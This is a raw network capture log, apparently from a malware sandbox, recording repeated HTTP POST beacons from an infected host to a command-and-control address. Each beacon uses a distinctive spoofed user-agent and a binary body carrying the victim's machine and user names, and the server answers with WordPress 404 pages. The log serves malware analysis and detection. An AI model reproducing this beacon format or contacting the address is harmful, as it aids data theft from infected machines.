May 29, 2024 15:45:50.576939106 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:45:50.576955080 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:45:50.576975107 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:50.576988935 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:45:50.577378988 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.9	49801	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:50.755707026 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:50.760795116 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:53.256736994 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:51 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:53.256757021 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:45:53.256851912 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:45:53.256863117 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:45:53.256874084 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:45:53.256886005 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:45:53.257040977 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:53.257054090 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:45:53.257064104 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:45:53.257142067 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.9	49802	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:53.430974960 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:53.435920000 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:56.033720016 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:53 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:56.033746004 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:56.033757925 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:56.033768892 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:56.033780098 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:56.033792019 CEST	1120	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:45:56.033806086 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:45:56.033816099 CEST	1236	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)
May 29, 2024 15:45:56.033827066 CEST	1236	IN	Data Raw: 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 Data Ascii: --white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange
May 29, 2024 15:45:56.033840895 CEST	672	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 Data Ascii: p--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.9	49803	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:56.184812069 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:56.189771891 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:58.882968903 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:56 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:58.883028030 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:58.883081913 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:58.883115053 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
